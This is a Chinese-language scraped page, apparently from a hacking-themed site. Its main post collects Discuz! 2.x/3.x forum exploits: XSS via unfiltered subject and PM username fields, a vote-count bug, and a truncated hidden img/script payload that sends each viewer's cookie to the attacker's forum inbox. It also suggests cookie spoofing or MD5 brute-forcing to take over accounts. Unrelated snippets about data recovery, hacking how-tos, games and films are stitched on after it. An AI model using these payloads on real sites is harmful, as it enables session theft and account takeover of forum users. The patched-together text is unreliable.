每日好文
攻防实验室的是这个论坛,于是找了一下资料,贴在这里============在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。 例如 http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用 *** :把上述代码放置到img中。 适用版本:discuz!2.x discuz!3.x 一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan) http://XXX/pm.php?action=send&username=XXXFan 因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如 http://XXX/pm.php?action=send&username=XXXFan ">里的内容加密,以进一步增加隐蔽性。 至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 本 *** 适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用 *** 请参与在我以前发表的discuz!悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n (n为选项,从0开始) 的方式通过URL来直接投票 但是如果n>更大选项呢,嘻嘻~ 照样提交成功,不过增加了一个标题为空的选项 效果见: http://discuz.net/viewthread.php?tid=20020&sid=dymPEc (那个最后的空白的是我刚加的) 该漏洞存在的版本: Discuz!3.X Discuz!2.X(可能,没有测试过) Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的,之一发现者(PK0909)。 具体的描述就不说了,下面是一个简单的测试代码。 http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E 上面的代码是显示出自己的cookie 下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了 [ img]http://pic.seo-6.com/Pupian/112020/mfy2j0sfl15-yseo_com.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCas
不能说的xs
建议你这样试试看:一大批的用户都曾遇到过桌面文件彻底删除的情况,尤其是对于一些没有分类保存习惯的用户来说,随手。 免费的电脑数据恢复软件目前相对较少,并且对于免费版软件来说,在文件恢复成功率上也都有所...
黑客怎么找某人信息相关问题 最简单的黑客入门教程pdf相关问题 2018黑客到底做什么了 黑客是怎么黑服务器(黑客怎么入侵服务器)...
微信删除好友的微信聊天记录是可以恢复的,除了从微信设置里面的找寻蛛丝马迹,我们还可以借助专业的恢复软件来帮忙恢复微信聊天记录。 微信怎么找回聊天记录?要问平时我们什么软件使用最频繁,那肯定是非微信莫属...
odzhan在文中给出了三种办法。public ref struct Writer where TBufferWriter : IBufferWriter sudo apt-get updategam...
王者荣耀snk皮肤会上架神秘商店吗?大家要看清楚不是皮肤碎片商店,而是神秘商店,这两个商店是完全不同的,snk皮肤只是史诗皮肤有没有机会进入神秘商店呢,如果有什么时候能进?小编马上就给大家分享相关攻略...
本文导读目录: 1、的剧情是什么啊?能详细介绍给我吗?谢谢了 2、碟中谍5人物性格分析 3、碟中谍黑人演员表 4、碟中谍1里汤姆克鲁斯找来的那个电脑高手叫啥名?! 5、有什么像碟中谍那...